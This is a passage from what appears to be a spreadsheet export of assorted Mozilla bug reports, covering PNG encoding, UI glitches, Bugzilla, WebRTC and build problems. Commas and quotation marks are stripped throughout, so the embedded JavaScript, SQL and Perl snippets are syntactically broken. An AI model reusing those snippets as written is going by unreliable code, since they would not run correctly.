  chunk IEND at offset 0x00110 length 0
No errors detected in png1-ok.png (-937.0% compression).
pngcheck on the new output is:
File: png1-bad.png (0 bytes)
  chunk IHDR at offset 0x0000c length 13
    3 x 3 image 24-bit RGB non-interlaced
  chunk acTL at offset 0x00025 length 8
    unknown private ancillary unsafe-to-copy chunk
  chunk fcTL at offset 0x00039 length 26
    unknown private ancillary unsafe-to-copy chunk
  chunk IDAT at offset 0x0005f length 16
    zlib:  deflated 256-byte window default compression
    zlib line filters (0 none 1 sub 2 up 3 avg 4 paeth):
      0 0 0 (3 out of 3)
  chunk fcTL at offset 0x0007b length 26
    unknown private ancillary unsafe-to-copy chunk
  chunk fdAT at offset 0x000a1 length 19
    unknown private ancillary unsafe-to-copy chunk
  chunk fcTL at offset 0x000c0 length 26
    unknown private ancillary unsafe-to-copy chunk
  chunk fdAT at offset 0x000e6 length 19
    unknown private ancillary unsafe-to-copy chunk
  chunk IEND at offset 0x00105 length 0
No errors detected in png1-bad.png (-896.3% compression).
Note that in the original image the IDAT line filters are set to 1/2/2 but in the new output they're 0/0/0. The fDAT checks also changed in size. [They're basically IDATs so I'd suspect the same thing happened pngcheck just doesn't know how to handle them.]
The libpng update seems to have added |#define PNG_NO_WRITE_FILTER| to modules/libimg/png/mozpngconf.h so it looks like this is probably expected if I'm understanding that right.
Our nsIImageEncoder interface doesn't support specifying row filters so this seems fine... I do wonder how the 1/2/2 values were getting set before -- were those the values or were we picking up initialized data?
Glenn if this all seems normal and expected I'll just update the unit tests for the new expected values.</t>
  </si>
  <si>
    <t>SEAMONKEY-260874</t>
  </si>
  <si>
    <t>Help window Activity Indicator (throbber) isn't right</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O rv:1.7.3) Gecko/20040913 Firefox/0.10
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O rv:1.7.3) Gecko/20040913 Firefox/0.10
Pinstripe Help window Activity Indicator (throbber) uses the Winstripe image
instead of the mac image (as in the browser window)
Reproducible: Always
Steps to Reproduce:
1. Load help
Actual Results:  
Winstripe Throbber
Expected Results:  
Pinstripe throbber</t>
  </si>
  <si>
    <t>k</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-394461</t>
  </si>
  <si>
    <t>previous 12 hours link no longer visible on static pages</t>
  </si>
  <si>
    <t>Since the tinderbox upgrade a few days ago http://tinderbox.mozilla.org/showbuilds.cgi?tree=Firefox has the links:
Show previous 12 hours
Show previous 24 hours
Show 12 hours from the previous 1 4 12 or 52 weeks.
at the bottom of the page but http://tinderbox.mozilla.org/Firefox/ does not have the links.  They should be present on both pages.</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-968769</t>
  </si>
  <si>
    <t>Gaia::UI Tests</t>
  </si>
  <si>
    <t>Remove data_layer and accessibility from base.py's init</t>
  </si>
  <si>
    <t>The data_layer class and accessibility class are only used in one app object yet it is initialised every time we initialise a new app object which may be hundreds of times in a test run.
We could reduce this by only initialising them in the app object it is used.
Most of the time self.data_layer is used directly in the test instead.</t>
  </si>
  <si>
    <t>fstrugariu</t>
  </si>
  <si>
    <t>zcampbell</t>
  </si>
  <si>
    <t>CORE-243948</t>
  </si>
  <si>
    <t>blocked images no longer blocks background images</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a) Gecko/20040517 Firefox/0.8.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a) Gecko/20040517 Firefox/0.8.0+
blocking images from a site no longer blocks background images.
this is a regression.
Reproducible: Always
Steps to Reproduce:
1. visit http://mozillazine.org/
2. block images from the site
3. refresh
Actual Results:  
background images are rendered (page header)
Expected Results:  
blocked all images.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-364252</t>
  </si>
  <si>
    <t>Need more robust scheme for bookmark helper menu items validation</t>
  </si>
  <si>
    <t>From bug 359662:
&gt;I am concerned with how fragile this system is. Did we get all the places we
&gt;needed to? Will we forget something later? We should file a bug for post-1.1 to
&gt;see if we can come up with a new scheme for bookmark menu maintenance.
This system is updating all our bookmark helper items in |delayedAdjustBookmarksMenuItemsEnabling| only and calling it manually whenever they need updating (on page loads on tab switches on a change in tab numbers).</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-361320</t>
  </si>
  <si>
    <t>Push update awards images to live site</t>
  </si>
  <si>
    <t>These images:
en-US/press/award-images/pcmag-editors-oct06.png
img/firefox/awards.png
ave been updated on the mozilla-com trunk - please push to the live site. Thanks.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-398751</t>
  </si>
  <si>
    <t>Core bugs causing problems for SeaMonkey 2</t>
  </si>
  <si>
    <t>This bug is here for tracking all bugs in Core that cause problems for the Gecko-1.9-based SeaMonkey 2 release.
Anything that causes the SeaMonkey team a need to omit a major improvement or hack out a nasty workaround because of this bug or missing feature in Core should go up here.
Core in this context means everything shared with XULRunner/Firefox which is rapidly nearing freezes currently.
Also we are only interested in things here which are not otherwise already marked as blocking 1.9 we are only tracking things that are showstoppers for SeaMonkey but not general 1.9 and which might not be fixed otherwise.
Please only add bugs here if you are in the SeaMonkey Council or in the team of people actively working on SeaMonkey 2 - everyone else please nominate relevant bugs via comment along with good explanations of why they cause major headaches for SeaMonkey 2.
And remember only bugs here that are affected by Firefox/Gecko freezes - everything else can be tracked with other nominations.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-191162</t>
  </si>
  <si>
    <t>thegomezlawfirm.com - the top frame does not extend to 100% of browser - right whitespace!</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3a) Gecko/20021212
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3a) Gecko/20021212
In all the pages at http://www.thegomezlawfirm.com/ for some reason the top
frame does not extend all the way to the browser's right leaving whitespace on
the right.  The page is set at (body leftmargin=0 topmargin=0) when means
that tables should extend all the way left and right.  
Reproducible: Always
Steps to Reproduce:
1. go to the following url: http://www.thegomezlawfirm.com/ 
2.
3.</t>
  </si>
  <si>
    <t>dmontal2</t>
  </si>
  <si>
    <t>CORE-481555</t>
  </si>
  <si>
    <t>TM: extra aborts in browser for string-validate input due to use of global name</t>
  </si>
  <si>
    <t>This appears to be costing us about 22ms.
My bastardized version of spew shows several of these:
abort: 5828: non-stub getter
Abort recording of tree http://www2.webkit.org/perf/sunspider-0.9/string-validate-input.html:52@18 at http://www2.webkit.org/perf/sunspider-0.9/string-validate-input.html:55@62: op.
The global 'name' refers to window.name which causes the 'non-stub getter' abort. This causes us to go on and off trace every iteration.</t>
  </si>
  <si>
    <t>CORE-530014</t>
  </si>
  <si>
    <t>ARIA single selectable widget should implement nsIAccessibleSelectable</t>
  </si>
  <si>
    <t>the patch should be part of bug 526703.</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-507300</t>
  </si>
  <si>
    <t>Get Mozmill running from the command line on Windows from within the build system</t>
  </si>
  <si>
    <t>Right now it is not possible to run the mozmill command line script on Windows with the Build System 1.4 installed. We miss the pywin32 extensions. See bug 507259.
Mikeal did already a change to dismiss the win32job module. But that's not all. After upgrading mozrunner from svn I get the following error:
$ pywin32 is not installed. Some wait() features in killableprocess may not func
tion properly.
Traceback (most recent call last):
  File c:\mozilla-build\python25\Scripts\mozmill-restart-script.py line 8 in
    load_entry_point('mozmill==1.2' 'console_scripts' 'mozmill-restart')()
  File c:\mozilla-build\python25\lib\site-packages\setuptools-0.6c9-py2.5.egg\p
kg_resources.py line 277 in load_entry_point
  File c:\mozilla-build\python25\lib\site-packages\setuptools-0.6c9-py2.5.egg\p
kg_resources.py line 2180 in load_entry_point
  File c:\mozilla-build\python25\lib\site-packages\setuptools-0.6c9-py2.5.egg\p
kg_resources.py line 1913 in load
  File c:\mozilla-build\python25\lib\site-packages\mozmill-1.2-py2.5.egg\mozmil
l\__init__.py line 48 in 
    import jsbridge
  File c:\mozilla-build\python25\lib\site-packages\jsbridge-2.0-py2.5.egg\jsbri
dge\__init__.py line 44 in 
    import mozrunner
  File /Volumes/data/build/mozrunner/mozrunner/__init__.py line 65 in &lt;modul
e&gt;
ImportError: No module named win32api</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-114316</t>
  </si>
  <si>
    <t>bonsai.mozilla.org should have a favicon.ico</t>
  </si>
  <si>
    <t>Now that Mozilla supports the displaying of icons for the bookmarks and tabs it
would be nice if the other *.mozilla.org pages besides http://www.mozilla.org/
would show an icon.
This are:
- bugzilla.mozilla.org
- tinderbox.mozilla.org
- ftp.mozilla.org
- bonsai.mozilla.org
- lxr.mozilla.org</t>
  </si>
  <si>
    <t>CORE-372351</t>
  </si>
  <si>
    <t>Support of Microsoft Cambria Math Fonts for MathML</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
Windows Vista and Office 2007 come with new fonts Cambria and Cambria Math. They are also installed as part of PowerPoint Viewer 2007[1] and the Microsoft Office Compatibility Pack[2]. These fonts should be used for MathML if available.
On Windows XP the fonts only can also be installed from the Compatibility Pack[2] using the following in Command Prompt (cmd):
fileformatconverters /quiet /extract:ffc
expand -f:*.tt? ffc\*.cab \windows\fonts
To install them on Linux/Unix use
wget http://download.microsoft.com/download/9/2/2/9222d67f-7630-4f49-bd26-476b51517fc1/FileFormatConverters.exe
cabextract -d ffc -LF*.cab FileFormatConverters.exe
cabextract -d ~/.fonts -LF*.tt? ffc/*.cab
If there are problems with the TrueType Collection (TTC) 'split' it in two:
cd ~/.fonts
perl -0777pe 's/(.{32})(.{332})/$2$1/s' cambria.ttc &gt; cambria.ttf
perl -0777pe 's/(.{364})(.{348})/$2$1/s' cambria.ttc &gt; cambriamath.ttf
rm cambria.ttc
chmod +x Cambria.ttf CambriaMath.ttf  # only necessary on Cygwin
[1] PowerPoint Viewer 2007
http://microsoft.com/downloads/details.aspx?FamilyID=048dc840-14e1-467d-8dca-19d2a8fd7485
[2] Microsoft Office Compatibility Pack for Word Excel and PowerPoint 2007 File Formats
http://microsoft.com/downloads/details.aspx?FamilyId=941B3470-3AE9-4AEE-8F43-C6BB74CD1466
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>markus+mozilla</t>
  </si>
  <si>
    <t>CORE-341950</t>
  </si>
  <si>
    <t>XUL elements in chrome hidden by content</t>
  </si>
  <si>
    <t>(this probably doesn't belong in safe browsing)
On trunk XUL elements can't be placed above the browser element.  This breaks safe browsing which places a canvas element and a vbox over the browser element.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-428898</t>
  </si>
  <si>
    <t>en-GB / English (United Kingdom)</t>
  </si>
  <si>
    <t>[en-GB] identity -&gt; identify in pippki.properties</t>
  </si>
  <si>
    <t>There is a typo in en-US see bug 428491 which got carried over to your localization.
This is not a blocker for Firefox 3 but if you want to fix it please attach and request approval1.9 before landing.</t>
  </si>
  <si>
    <t>moz_en-gb</t>
  </si>
  <si>
    <t>BUGZILLA-315317</t>
  </si>
  <si>
    <t>DBI placeholders break AppendComment's default timestamp</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20051025 Firefox/1.5
Build Identifier: 
If calling AppendComment with an indefined $timestamp (e.g. AppendComment($bug$login_name$message)) the query is supposed to substitute function NOW() in the INSERT query.
Unfortunately now that the query is done with DBI and placeholders it appears that the function call is being bound as a string causing an incorrect zero timestamp to be stored instead of current time. This zero timestamp apart from being bogus means added comments are not displayed on bug pages.
Reproducible: Always
Steps to Reproduce:
1. invoke AppendComment($bug$login_name$message)
2. in MySQL examine bug_when field in table longdescs in the newly inserted record.
Actual Results:  
timestamp will read 0000-00-00 00:00:00
Expected Results:  
timestamp should be time of INSERT (e.g. 2005-11-06 16:53:31)
My quick and dirty workaround is to use two different queries depending on whether timestamp is defined:
if($timestamp){
    $dbh-&gt;do(q{INSERT INTO longdescs
                      (bug_id who bug_when thetext isprivate work_time)
               VALUES (??????)} undef
             ($bugid $whoid $timestamp $comment $privacyval $work_time))
}else{
    $dbh-&gt;do(q{INSERT INTO longdescs
                      (bug_id who bug_when thetext isprivate work_time)
               VALUES (??now()???)} undef
             ($bugid $whoid $comment $privacyval $work_time))
}</t>
  </si>
  <si>
    <t>toby</t>
  </si>
  <si>
    <t>CORE-359124</t>
  </si>
  <si>
    <t>Can't print in cairo-cocoa builds</t>
  </si>
  <si>
    <t>printing doesn't work in cairo-cocoa builds...</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-266969</t>
  </si>
  <si>
    <t>Add Theme: SphereGnome Big</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20041029 Firefox/1.0RC1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20041029 Firefox/1.0RC1
NEW THEME--SphereGnome Big
Version 0.1 is here:
http://www.pshrink.com/phoenix/SphereGnomeBig_0_1.jar
Comment: 
SphereGnome Big is aimed at small screens with high resolutions. It is based on
SphereGnome a cool theme with brightly colored buttons. The button icons are
sized at 32x32 and 48x48 with browser icons at 24x24 (Firefox default has 16x16
browser icons). It is aimed at screen resolutions of 1024x768 through 1600x1200.
Depending on your screen size you can now pick from SphereGnome (normal)
SphereGnome Big (150% normal) and SphereGnome Jumbo (200% normal).
Preview:
http://www.pshrink.com/phoenix/SphereGnome_preview.png
Homepage: none
Author: Ed Hume (email: edhume@gmail.com)
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>ehume</t>
  </si>
  <si>
    <t>SEAMONKEY-528629</t>
  </si>
  <si>
    <t>Redo Undo both use keyboard shortcut COMMAND+Z in Mail message composition</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1.23) Gecko/20090823 SeaMonkey/1.1.18 Mnenhy/0.7.5.0
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1.23) Gecko/20090823 SeaMonkey/1.1.18 Mnenhy/0.7.5.0
Typical keyboard commands for Undo and Redo (with unlimited Undo) are COMMAND+Z for Undo and COMMAND+SHIFT+Z for Redo. This is the labeling in the browser component of SeaMonkey but under Mail the shortcuts are both COMMAND+Z. The COMMAND+Z/COMMAND+SHIFT+Z shortcuts work correctly in the subject line of the email but not in the message area.
Reproducible: Always
Steps to Reproduce:
1. Compose mail message
2. Make several additions and deletions
3. Press COMMAND+Z a few times
Actual Results:  
Last edit is undone and redone.
Expected Results:  
Last few edits progressively undone.
I've filed the menu keyboard shortcut display as Bug#528628</t>
  </si>
  <si>
    <t>ccsccs7</t>
  </si>
  <si>
    <t>FIREFOX-207406</t>
  </si>
  <si>
    <t>View Source entered through js console has got Mozilla-specific menu items some of them do not work.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030526 Mozilla Firebird/0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030526 Mozilla Firebird/0.6
If you click a url in JavsScript Console View Source opens. It is different
from the normal View Source. It has Mozilla-specific menu items. Some of them do not
work.
Reproducible: Always
Steps to Reproduce:
1. Open Javascript console.
2. Look for a link in it. If you can't find one browse to
http://java.sun.com/getjava/
3. Click on the url (not beneath it).
Actual Results:  
A View Source window opens and jumps to the line of the error (new Mozilla
feature). It has several menu items from the Mozilla version of View Source
which are not present in the normal Firebird version of View Source:
Menu File-New-Navigator Window Composer Page (doesn't work) Message (my email
client opens a new message)
Menu File-Edit Page (doesn't work) Page Setup
Menu Edit-Goto line Find Previous Find Text As You Type
Menu View-Text Zoom
Menu Help-Release Notes About Plug-ins About Mozilla Firebird.
Expected Results:  
The View Source window entered from the js console should show the same menu
items as the normal Firebird one. They should both contain useful items such
as Edit-Goto line Find Previous Find Text As You Type and View-Text Zoom.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-528805</t>
  </si>
  <si>
    <t>Cannot search for milestones nor change them in bugs</t>
  </si>
  <si>
    <t>https://bugzilla-stage-tip.mozilla.org/ displays no target milestone in query.cgi show_bug.cgi doesn't let you change them in bugs and editproducts.cgi has an empty default milestone list for all products. The reason is because all milestones are marked as inactive + non-searchable.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-255343</t>
  </si>
  <si>
    <t>[german help] Translate cs_nav_prefs_appearance.xhtml</t>
  </si>
  <si>
    <t>Aktualisierung von cs_nav_prefs_appearance.xhtml</t>
  </si>
  <si>
    <t>CORE-112659</t>
  </si>
  <si>
    <t>nsSocketTransport does not cache DNS service</t>
  </si>
  <si>
    <t>TESTOPIA-386325</t>
  </si>
  <si>
    <t>Filtering by component can yield duplicate results</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Build Identifier: 1.2
If a test case is associated to more than one component it will be returned multiple times when filtering by more than one of those components. For instance assume we have three components (C1 C3 and C3). Now let's assume we have a test run that includes the following test cases with their associated components in brackets...
TC1 (C1)
TC2 (C1 and C2)
TC3 (C3)
TC4 (C2 and C3)
In the test run search we choose to filter by component and select both C1 and C2 meaning we want all test cases that are associated to C1 and/or C2. We would therefore expect to get the following list returned...
TC1
TC2
TC4
Instead we get the following...
TC1
TC2
TC2
TC4
The second result is duplicated because it is associated to both components that have been queried (likely a missing DISTINCT in the sql). The test case count at the bottom becomes inaccurate because counts them separately. In our previous example it would say that there are 4 test cases that match our filtering criteria in the current test run when in truth there are only three.
Reproducible: Always
Steps to Reproduce:
1. Associate five different components to a test case
2. Create a test run that includes this test case
3. In the test run view expand the Filter section
4. Select three of the five components associated to the TC in Step 1 and click the Filter button.
Actual Results:  
The same test case run is listed three times and the test case count at the bottom of the table says 3 test cases found when in truth there's only one.
Expected Results:  
The test case run is listed only once. The count at the bottom says 1 test case found.
Note that clicking on the Case ID heading can be used as a temporary workaround due to bug 384212 (as long as you don't have a version where it's already fixed).</t>
  </si>
  <si>
    <t>cgalanis</t>
  </si>
  <si>
    <t>CORE-998546</t>
  </si>
  <si>
    <t>ontrack and onaddstream fire too late</t>
  </si>
  <si>
    <t>The current version of the webrtc spec says:
onaddstream of type EventHandler
    This event handler of event handler event type addstream MUST be fired by all objects implementing the RTCPeerConnection interface. It is called any time a MediaStream is added by the remote peer. This will be fired only as a result of setRemoteDescription. Onnaddstream happens as early as possible after the setRemoteDescription. This callback does not wait for a given media stream to be accepted or rejected via SDP negotiation.
But if you run one of our simple test cases you will see that onaddstream for the answer side (pcRemote in the test output) fires really late:
./mach mochitest-plain dom/media/tests/mochitest/test_peerConnection_basicAudioVideo.html  | egrep -i (onaddstream|setRemoteDescription|SET_REMOTE_DESCRIPTION)
 0:17.53 44 INFO TEST-INFO | /tests/dom/media/tests/mochitest/test_peerConnection_basicAudioVideo.html | Run step: PC_REMOTE_SET_REMOTE_DESCRIPTION
 0:17.54 737435648[13082aa90]: [GSM Task|tnp] ui.c:1712: SIPCC-UI_API: 1/2 ui_set_remote_description: state=27 call_instance=0
 0:17.55 48 INFO TEST-PASS | /tests/dom/media/tests/mochitest/test_peerConnection_basicAudioVideo.html | signalingState after remote setRemoteDescription is 'have-remote-offer'
 0:17.57 53 INFO TEST-INFO | /tests/dom/media/tests/mochitest/test_peerConnection_basicAudioVideo.html | Run step: PC_LOCAL_SET_REMOTE_DESCRIPTION
 0:17.67 1990591248[1003342d0]: [main|PeerConnectionImpl] PeerConnectionImpl.cpp:255: Returning success for OnAddStream()
 0:17.67 737435648[13082aa90]: [GSM Task|tnp] ui.c:1712: SIPCC-UI_API: 1/1 ui_set_remote_description: state=27 call_instance=0
 0:17.67 56 INFO TEST-INFO | /tests/dom/media/tests/mochitest/test_peerConnection_basicAudioVideo.html | PeerConnectionWrapper (pcLocal): 'onaddstream' event fired for {}
 0:17.68 61 INFO TEST-PASS | /tests/dom/media/tests/mochitest/test_peerConnection_basicAudioVideo.html | signalingState after local setRemoteDescription is 'stable'
 0:17.73 1990591248[1003342d0]: [main|PeerConnectionImpl] PeerConnectionImpl.cpp:255: Returning success for OnAddStream()
 0:17.73 70 INFO TEST-INFO | /tests/dom/media/tests/mochitest/test_peerConnection_basicAudioVideo.html | PeerConnectionWrapper (pcRemote): 'onaddstream' event fired for {}
 0:19.85     1.315054 |    1.066513 | Set Remote Description         | PeerConnectionImpl.cpp:1274  | SetRemoteDescription
 0:19.86     1.535206 |    0.054609 | Set Remote Description         | PeerConnectionImpl.cpp:1274  | SetRemoteDescription
If it helps to prove the point here I'll go ahead and implement the test case requested in Bug 966528.</t>
  </si>
  <si>
    <t>docfaraday</t>
  </si>
  <si>
    <t>drno</t>
  </si>
  <si>
    <t>THUNDERBIRD-370786</t>
  </si>
  <si>
    <t>Dettaching an attachment fails to reload the message</t>
  </si>
  <si>
    <t>using a trunk debug build from this morning. If I try to detach an attachment in my imap account we fail to reload the message.
I get the following error in the JS console:
************************************************************
* Call to xpconnect wrapped JSObject produced this error:  *
[Exception... Component returned failure code: 0x80004003 (NS_ERROR_INVALID_POI
NTER) [nsIMsgMessageService.messageURIToMsgHdr]  nsresult: 0x80004003 (NS_ERRO
R_INVALID_POINTER)  location: JS frame :: chrome://messenger/content/msgMail3P
aneWindow.js :: SelectMessage :: line 1671  data: no]
************************************************************
If this happens on the branch too it could be a tb2 stopper.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-481857</t>
  </si>
  <si>
    <t>Prism stub crashes in release mode on Linux</t>
  </si>
  <si>
    <t>The stub reports a buffer overflow.</t>
  </si>
  <si>
    <t>CORE-485052</t>
  </si>
  <si>
    <t>Embed a list of default OCSP Responder URLs for certain CAs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1)
Build Identifier: trunk
Bug #483168 defined a new NSS callback API (targeted for NSS 3.12.3) for providing a default OCSP Responder URL.
This bug is for patching PSM to hook this new NSS API to provide default OCSP Responder URLs for EV certificate chains from (at least) Comodo and Network Solutions.  Previous attempts at writing this patch can be found in bug #477244 and bug #483168.
Reproducible: Always</t>
  </si>
  <si>
    <t>THUNDERBIRD-370015</t>
  </si>
  <si>
    <t>Duplicate 'Options' and 'Account Settings' items under Edit menu</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Build Identifier: version 2 beta 2 (2007021003)
In main mail window under 'Edit' menu there is a duplicate 'Options' preference (moreover with no descriptive text) down at the last position. When clicked it opens the Options window same as Tools -&gt; Options.
Reproducible: Always
An attachment follows. Also tested on a fresh new profile without any extension (CuteMenus etc.) - it's still there albeit smaller.</t>
  </si>
  <si>
    <t>koubekk</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-681121</t>
  </si>
  <si>
    <t>SCL2 VLAN Request for Rack 1-6</t>
  </si>
  <si>
    <t>Please configure the server below.  These hosts are powered on but are idle at the moment.  Inventory has been updated to show their connected switch ports.  
vm1-3.scl2.svc.mozilla.com
Set the inventory ethernet ports to the following VLANs:
VLANs:
vlan 706 - untagged
vlan 710 - tagged (prod reg)
vlan 711 - tagged (prod sreg)
vlan 714 - tagged (prod web)
vlan 910 - tagged (staging reg)
vlan 911 - tagged (staging sreg)
vlan 914 - tagged (staging web)
vlan 960 - tagged (beta reg)
vlan 961 - tagged (beta sreg)
vlan 964 - tagged (beta web)
Set the inventory OOB port to the following VLAN:
vlan 706 - untagged
If this can be done by August 26th that would be great!
Thanks!</t>
  </si>
  <si>
    <t>aanewman</t>
  </si>
  <si>
    <t>jlaz</t>
  </si>
  <si>
    <t>NSPR-30746</t>
  </si>
  <si>
    <t>Problems with the primordial thread being converted to a local thread in the MxN thread model</t>
  </si>
  <si>
    <t>In the combined (MxN) thread model the current implementation
of NSPR converts the primordial thread into a local thread and
uses the underlying native thread as an execution entity to run
local threads and the idle thread (part of the NSPR thread
scheduler).
This implementation strategy is problematic when the primordial
thread calls a native blocking function that blocks the underlying
native thread thus preventing the other local threads and the
idle thread on that execution entity from running.  On Windows NT
this problem may manifest itself as follows:
1. A thread calls an NSPR I/O function and hangs in _NT_IO_WAIT.
   This is because on Windows NT NSPR uses the idle threads to
   read the I/O completion port but the idle thread (by default
   only one is created) is blocked.  This can be worked around
   by calling PR_SetConcurrency(n) where n is an interger larger
   than 2 at the beginning of the main() function to create
   additional idle threads.
2. PR_CreateThread() hangs trying to acquire the internal lock
   _pr_activeLock which is being held by the internal thread
   TimerManager (prmwait.c).  The TimerManager thread is created
   during NSPR initialization as a local thread which at the time
   is runnable but cannot be scheduled to run because the native
   blocking function called by the primordial thread blocks the
   underlying execution entity.  I am not sure if PR_SetConcurrency()
   can work around this problem.  One workaround is to create a
   global thread to run the real main function and join with that
   global thread.
This problem has been reported so many times that I think it
needs to be fixed.  I propose that we leave the primordial thread
as a plain native thread and create a new native thread as the
execution entity to run local threads and the idle thread.
This will create one more native thread than the current
implementation does but it will save us and our clients
from wasting time in debugging this problem down the road.</t>
  </si>
  <si>
    <t>FIREFOX-323761</t>
  </si>
  <si>
    <t>default page style not available when preferred stylesheet's media is not screen or all</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060104 Firefox/1.6a1 - Build ID: 2006010405
The given URL has some default styles and an alternate stylesheet for handhelds
When filling the View-&gt;Page Style menu Firefox thinks he doesn't have to show the entry default page style because there is a preferred stylesheet set (a stylesheet with title attribute).
Unfortunately the preferred stylesheet has media=handheld so it is not displayed in the menu and Firefox isn't displaying this the menu too.
Reproducible: Always
Steps to Reproduce:
1. Load given URL
2. Open menu View-&gt;Page Style
Actual Results:  
There is only an entry for No Style if you select No Style you can't switch back
Expected Results:  
There should be the menuitem Default Style
The problem is in function stylesheetFillPopup(menuPopup) in browser.js
Here is a fixed version of the function i've commented by changes:
---------------------
function stylesheetFillPopup(menuPopup)
{
  var noStyle = menuPopup.firstChild
  var persistentOnly = noStyle.nextSibling
  var sep = persistentOnly.nextSibling
  while (sep.nextSibling)
    menuPopup.removeChild(sep.nextSibling)
  var styleSheets = getAllStyleSheets(window.content)
  var currentStyleSheets = []
  var styleDisabled = getMarkupDocumentViewer().authorStyleDisabled
  var haveAltSheets = false
  var altStyleSelected = false
  var altSheetsAdded = false
  for (var i = 0 i &lt; styleSheets.length ++i) {
    var currentStyleSheet = styleSheets[i]
    // Skip any stylesheets that don't match the screen media type.
    var media = currentStyleSheet.media.mediaText.toLowerCase()
    if (media &amp;&amp; (media.indexOf(screen) == -1) &amp;&amp; (media.indexOf(all) == -1))
        continue
    if (currentStyleSheet.title) {
      if (!currentStyleSheet.disabled)
        altStyleSelected = true
      haveAltSheets = true
      var lastWithSameTitle = null
      if (currentStyleSheet.title in currentStyleSheets)
        lastWithSameTitle = currentStyleSheets[currentStyleSheet.title]
      if (!lastWithSameTitle) {
        var menuItem = document.createElement(menuitem)
        menuItem.setAttribute(type radio)
        menuItem.setAttribute(label currentStyleSheet.title)
        menuItem.setAttribute(data currentStyleSheet.title)
        menuItem.setAttribute(checked !currentStyleSheet.disabled 
        menuPopup.appendChild(menuItem)
	altSheetsAdded = true
        currentStyleSheets[currentStyleSheet.title] = menuItem
      } else {
        if (currentStyleSheet.disabled)
          lastWithSameTitle.removeAttribute(checked)
      }
    }
  }
  noStyle.setAttribute(checked styleDisabled)
  persistentOnly.setAttribute(checked !altStyleSelected 
  persistentOnly.hidden = (window.content.document.preferredStylesheetSet 
  sep.hidden = (noStyle.hidden 
  return true
}
------------------
I've added the var altSheetsAdded that checks if we have added an additional menuitem for the preferred Stylesheet. The Default Page Style-menuitem may only be hidden if this is true.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-425878</t>
  </si>
  <si>
    <t>Bookmarks History and about:blank site icons (favicons) fail to load on first load of bookmarks/history/about:blank</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X en rv:1.8.1.13) Gecko/20080327 Camino/1.6b4 (like Firefox/2.0.0.13)
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X en rv:1.8.1.13) Gecko/20080327 Camino/1.6b4 (like Firefox/2.0.0.13)
If you launch Camino with a blank homepage and the first thing you open is the bookmark manager or the history (or if you set one of these as your homepage) their favicons fail to display instead showing globe_ico.
I noticed that when you launch Camino it first shows globe_ico then switches to smallDocument then back to globe_ico! Perhaps this is at the root of the problem. Shouldn't smallDocument display in the first tab upon launch?
Subsequently whenever you open a new tab it always shows globe_ico first before switching to smallDocument.
Reproducible: Always
Steps to Reproduce:
1. Launch Camino.
2. Open the Bookmark Manager or History
Actual Results:  
Their favicon will display really quickly before switching back to globe_ico
Expected Results:  
Their favicons should display</t>
  </si>
  <si>
    <t>davedit</t>
  </si>
  <si>
    <t>CORE-383478</t>
  </si>
  <si>
